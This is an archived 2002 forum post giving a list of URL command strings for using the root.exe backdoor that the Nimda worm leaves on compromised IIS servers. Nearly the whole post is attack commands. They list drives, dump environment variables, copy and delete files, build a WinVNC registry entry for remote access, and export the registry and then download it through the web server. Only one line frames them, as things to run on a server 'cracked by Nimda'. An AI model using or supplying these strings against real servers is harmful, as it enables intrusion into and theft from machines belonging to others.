subject: nimda exploit strings
posted: Thu, 22 Aug 2002 22:45:27 +0100


should you find youself with a server cracked by Nimda, the following commands can be executed -
although since ROOT.EXE is a copy of CMD.EXE (the command interpreter), these are more an example:

dir traversal
http://xxx.xxx.xxx.xxx/scripts/root.exe?/c+dir+c:\..

dir current
http://xxx.xxx.xxx.xxx/scripts/root.exe?/c+dir+D:

dir root
http://xxx.xxx.xxx.xxx/scripts/root.exe?/c+dir+e:\

environment vars
http://xxx.xxx.xxx.xxx/scripts/root.exe?/c+set

quotation marks
http://xxx.xxx.xxx.xxx/scripts/root.exe?/c+dir+%22*.dll%22

copy command
http://xxx.xxx.xxx.xxx/scripts/root.exe?/c+copy+admin.dll+t.d
l

delete command
http://xxx.xxx.xxx.xxx/scripts/root.exe?/c+del+t.dll

type command
http://xxx.xxx.xxx.xxx/scripts/root.exe?/c+type+now.txt

redirection 1
http://xxx.xxx.xxx.xxx/scripts/root.exe?/c+dir%20%3e%20now.tx
t

redirection 2
http://xxx.xxx.xxx.xxx/scripts/root.exe?/c+echo+REGEDIT4>winv
nc.reg

append blank line
http://xxx.xxx.xxx.xxx/scripts/root.exe?/c+echo.>>winvnc.reg

append line
http://xxx.xxx.xxx.xxx/scripts/root.exe?/c+echo[HKEY_LOCAL_MA
CHINE\SOFTWARE\ORL\WinVNC3\Default]%3e%3ewinvnc.reg

export registry
http://xxx.xxx.xxx.xxx/scripts/root.exe?/c+regedit%20/e%20reg
istry.txt

download registry
http://xxx.xxx.xxx.xxx/scripts/registry.txt




---
* Origin: [adminz] tech, security, support (192.168.0.2)

generated by msg2page 0.06 on Jul 21, 2006 at 19:04:37

 search: